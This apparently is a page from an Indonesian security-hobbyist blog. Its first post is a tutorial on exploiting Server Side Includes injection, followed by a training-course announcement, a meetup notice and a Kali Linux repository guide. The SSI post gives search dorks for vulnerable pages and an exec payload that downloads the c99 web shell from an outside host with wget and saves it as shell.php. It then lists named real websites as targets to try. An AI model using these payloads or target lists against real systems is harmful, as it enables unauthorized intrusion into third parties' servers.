Exploitasi Bug Server Side Includes Injection

23:42 |
SSI Injection (Server-side Include) adalah tehnik exploit server side yang mengizinkan attacker untuk mengirim perintah yang nanti nya akan di eksekusi oleh web server 

SSI Injection memanfaatkan kegagalan aplikasi web untuk membersihkan data yang disediakan pengguna sebelum mereka dimasukkan ke dalam server-side ditafsirkan file HTML

Sever Side Includes Termasuk serangan memungkinkan eksploitasi aplikasi web dengan menginjeksi skrip dalam halaman HTML atau mengeksekusi kode arbitrary codes remotely.

Kalau di Php untuk memulai dan menutup kita gunakan <? dan ?>
kalau SSI <!-- --> 

Include PHP

Code:
<? include "file.html"; ?>
Include SSI
Code:
<!--  #include virtual="file.html"  -->

SSI untuk mengeskekusi perintah CLI

Code:
<!-- #exec cmd="ls -A" -->

CGI

Code:

<!-- #exec cgi="/cgi-bin/any_script.cgi" --> 



biasanya halaman yang menggunakan SSI itu berformat 
.shtml / .shtm / .stm

Sudah perkenalan dengan ssi mari kita melakukan exploitasi ..
Kita bisa gunakan

inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=


http://i.imgur.com/Fw7qE.png



<!-- 
#echo var="HTTP_USER_AGENT" --> 
http://i.imgur.com/8oms4.png


<!-- 
#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" --> 
http://i.imgur.com/VDc9n.png


sitetarget.com/shell.php big grin
http://i.imgur.com/4a7bR.png



anda bisa coba di sini ... walau sih di situ udah di fix .. tapi beberapa perintah masih bisa happy

http://www.cgibackgrounds.com/bin/Cklb
http://www.stockshop.com/bin/Cklb
http://www.fogstock.com/bin/Cklb
http://www.glasshouseimages.com/user/login.shtml
http://www.wppionlinecontest.com/user/login.shtml
http://www.cgibackgrounds.com/user/login.shtml
http://www.getstock.com/user/login.shtml
http://www.estostock.com/user/login.shtml
http://www.blendimages.com/user/login.shtml
http://www.pdnthelook.com/user/login.shtml
http://iloveimages.com/user/login.shtml
http://www.win-initiative.com/user/login.shtml (view source to see output)
http://thegatheringsphotocontest.com/user/login.shtml


Sumber :
https://www.owasp.org/index.php/Testing_...SP-DV-009)

penjelasannya agak berantakan ya happy soalnya dari bahasa ingriss ane translate manual :v .
Read more…

Fly With Backtrack V.2 | FREE TRAINING & COURCE

01:36 |
Yup setelah sekian lama Fly With Backtrack atau disingkat FWB pertama telah selesai, kini FWB v.2 Telah hadir kembali .

Demi memajukan generasi IT Indonesia , dimana telah di rumuskan pada visi dan misi kami , maka kami segenap keluarga besar IBT membuka kursus menggunakan tools-tools backtrack dengan sertifikasi attendance yang di keluarkan oleh forum kami. Kami mengadakan pelatihan atau training dengan metode online. sehingga anda akan kami pandu dengan chat, webcam , ataupun video & audio call ~ IBTeam.
Pendaftaran 27 April || Pelaksanaan 13 Mei

Sebelumnya kami Selaku staff IBT meminta maaf kepada teman teman backtrackers yang telah menunggu pendaftaran, Dikarenakan ada sesuatu yang harus kami selesaikan terlebih dahulu, Maka Pendaftaran Untuk Fly With Backtrack ( FWB V.2) Kami Tunda Sampai Tanggal 30 April 2013 Malam ,, Terimakasih ,, 



1) Ngomong-ngomong FWB itu apa sih?
--> FWB merupakan pelatihan atau training dengan metode online yang membahas menggunakan tools-tools backtrack dengan sertifikasi attendance yang di keluarkan oleh Indonesian Backtrack Team . Dan sebagai Acuan pembelajarannya, FWB membahas dan mengajarkan tentang semua apa yang ada dibuku ASWB (Attacking Side With Backtrack) untuk FWB v.2 membahas buku ASWB v.2 .

2) Persyaratannya apa saja?
--> Limit Bangku peserta adalah 30 Bangku.
--> Biaya?? Seperti yang dikutip disini bahwa Pelatihan dan Kursus ini 100% Free a.k.a GRATIS  cyin . Dengan persyaratan sebagai berikut :
~ Merupakan Donatur atau member VIP diforum.
Bagaimana jika saya bukan donatur atau saya belum bisa mendonasi apa-apa untuk IBT?
Tenang aja ,,, kami juga memberi kesempatan kepada mereka yang tergabung dengan regional resmi, daftarkanlah diri anda ke regional-regional yang telah resmi kami dirikan di daerah - daerah berikut ini:
 Aceh | web
Sumatra Barat | web
Semarang | web
Jogjakarta | web
Riau | web
Makassar | web
Jabodetabek | web 
Kalimantan
Madura & Bali 
Papua
Silahkan menghubungi ketua regional tersebut untuk konfimasi keanggotaan.
~ Setiap ketua regional merekomendasikan 2 anggotanya untuk mengikuti FWB v.2 dan pelatihan FWB untuk di Share ke teman2 Regional Lain.
--> Kelas dibagi menjadi 5 kelas dengan nama kelas masing - masing
1. Lothar
2. Aghanim
3. Ezalor
4. Leshrac
5. Morphling
--> Menyiapkan Tools - Tools yang ada dalam ASWB 2.
--> Mendaftarkan diri di http://training.indonesianbacktrack.or.id

3) Administrasi
1. Foto Asli, Fotocopy KTP or Pelajar.
2. Biodata saat pendaftaran.
3. Menyetujui Ketentuan - Ketentuan FWB.

FWB 2 , IBTeam , Backtrack Indonesia
FWB v.2

Contact person :
1. Mirwan aka Cassaprodigy (087873791567)
2. Toni aka ino_ot (08988969786)

*cek disini untuk lebih jelasnya Disini nih dan Disini
Read more…

Gathering ke 2 | Indonesia Backtrack Team ~ Code : Jabodetabek

09:03 |
Setelah sekian lama setelah gathering pertama regional jabodetabek diTaman Menteng, Kini kami (regional jabodetabek) kembali mengadakan gathering yang kedua ...

Info selengkapnya bisa dilihat dipamflet berikut :

IBT~Regional:Jabodetabek
Contact Person :
1.Cyberking 089610000978
2.Obands 085697787403
3.Ino_ot 0898969786

Read more…

Cara menambah full repository di Kali Linux 1.0

02:27 |

seperti yang kita tau kalo kali linux adalah sebuah distribusi linux yang di rancang untuk penetration testing atau sama dengan backtrack 6 , yang di bangun dari base debian . di sini saya akan memberikan tutorial cara menambah full repository di Kali Linux 1.0 dengan mudah . Repository adalah tempat penyimpanan bagi arsip-arsip software, dimana sofware dalam arsip ini dapat diambil oleh user untuk digunakan.

1.nga usah pake lama , langsung saja buka terminal dan copykan code di bawah ini :

sudo vi /etc/apt/sources.list


2.maka akan menemukan di dalam sources.list sebagai super user menggunakan editor vim untuk mengedit repositori – untuk menggunakan vim .dan copykan repository di bawah ini kedalam source list kali linux .

deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

3.lanjutkan dengan perinta di bawah ini untuk mengupdate repository :

apt-get update

4.dan lanjutkan dengan perintah terakhir dengan :

apt-get upgrade
source : disini nih
Read more…

Followers

Total Tayangan Laman